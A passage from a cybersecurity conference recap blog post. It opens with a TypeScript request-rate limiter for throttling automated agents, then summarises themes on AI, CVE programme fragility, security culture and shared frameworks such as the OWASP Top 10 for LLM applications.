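// Keyed by whatever identifies the client: IP, API key, or a bot signature.
const windows = new Map<string, RequestWindow>();

function allowRequest(clientKey: string, now: number = Date.now()): boolean {
  const w = windows.get(clientKey);
  if (!w || now - w.start >= WINDOW_MS) {
    windows.set(clientKey, { start: now, count: 1 }); // start a fresh window
    return true;
  }
  w.count += 1;
  // Over the cap: answer with 429, or 402 if you are pricing automated access.
  return w.count <= MAX_REQUESTS;
}
```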

The takeaway was pragmatic. You will not stop every agent, and that is not the goal. The goal is to slow them, price them, and make them prove they are worth your resources. Move the cost curve back onto the operator, protect the parts of the site that matter most, and apply friction only where it changes their economics. That balance lets real users move freely while automated traffic pays its way or fades out.


Pulling the Threads Together

Taken together, the sessions showed an industry at a crossroads. We are no longer debating whether AI matters, whether secure development can be left to annual training, or whether our dependency on centralised infrastructure is fragile. The evidence is already here. Attackers are creative and fast. Developers are using AI whether their organisations are ready for it or not. Security teams are drowning in tools while overlooking culture. And critical systems like CVE have proven vulnerable to political delays in contract funding.

AI continues to reshape the field’s focus

What came through clearly across multiple talks is that AI is not just present, it is steering how both attackers and defenders prioritise their work. Attackers are generating phishing kits, deepfake content, and poisoned data at scale. Developers are relying on Copilot and similar tools, often pushing AI generated code straight into production. For defenders, the focus has shifted from whether AI matters to how quickly they can adapt controls, testing, and governance to keep pace with this reality.

Fragility is systemic

The near-collapse of the CVE programme showed how much of our global security infrastructure depends on contracts, politics, and single points of failure. This theme repeated in other contexts too. Singh’s examples of tool sprawl, where overlapping products create noise without clarity, highlighted fragility inside organisations. And the OWASP Top 10 for LLM applications showed how easily over-permissioned AI agents can create brittle dependencies. These are different examples of the same problem. The structures we lean on most heavily are also the ones most vulnerable to disruption.

Culture is more important than ever

Tools, frameworks, and policies cannot substitute for culture. Singh made it clear that AppSec programmes collapse when they rely on scans and dashboards rather than engaging developers. SecDim demonstrated the opposite, showing that tailored training mapped to actual developer repos creates momentum and ownership. This theme has surfaced in my own consulting experience too. Programmes succeed when developers have secure defaults, paved road images, and training that matters. They fail when security is treated as a box ticking exercise or a compliance obligation.

Shared language and frameworks (still) matter

Frameworks provide a way for people to align on risk. The OWASP Top 10 for LLM applications was powerful not because every entry was new, but because it gave teams a consistent way to talk about risks that were already being observed. Michael Matthee’s threat modelling framework worked the same way. By grounding analysis in structured questions, he gave both technical and business teams a way to reason about threats without starting from scratch each time. Shared frameworks remain essential because they let teams reason together instead of working in silos.

Critical thinking is non-negotiable

Across all sessions, a common warning surfaced. No guardrail is perfect, no automation covers every case, and no model is immune to manipulation. Whether it was prompt injection slipping past filters, blocking rules breaking developer workflows, or scanners failing to identify runtime exposure, the message was clear. Security cannot be fully automated away. Humans still need to question assumptions, challenge outputs, and look for the weak signals that systems miss. Critical thinking remains the last line of defence.

The next steps are not just for individual teams, they are for the industry as a whole. We need to fund and sustain the infrastructure we all rely on, from vulnerability databases to community projects. We need to shift investment from buying overlapping tools to building capacity, such as training, defaults, and cultures that last longer than a product cycle. We need to be realistic about what AI can and cannot do, and start testing and governing it with the same creativity we assume of attackers. Most of all, we need to acknowledge that the habits of the past will not be enough for the future.

The conference reinforced what I wrote earlier: AI is a double edged sword for security teams. It can accelerate development and defence, but it can just as easily accelerate mistakes. The difference will come down to whether the industry builds the habits, governance, and culture to wield it safely.

Rob Kehl
Rob Kehl is a Principal Cybersecurity Adviser and educator based in Aotearoa New Zealand. Originally from the United States, his career spans the U.S. Air Force and global consultancies like Sygnia and Cognizant. Rob specialises in architecture assessments, incident response, security operations, and AI security strategies. He applies his international experience to support cybersecurity resilience across sectors in New Zealand.

Get in touch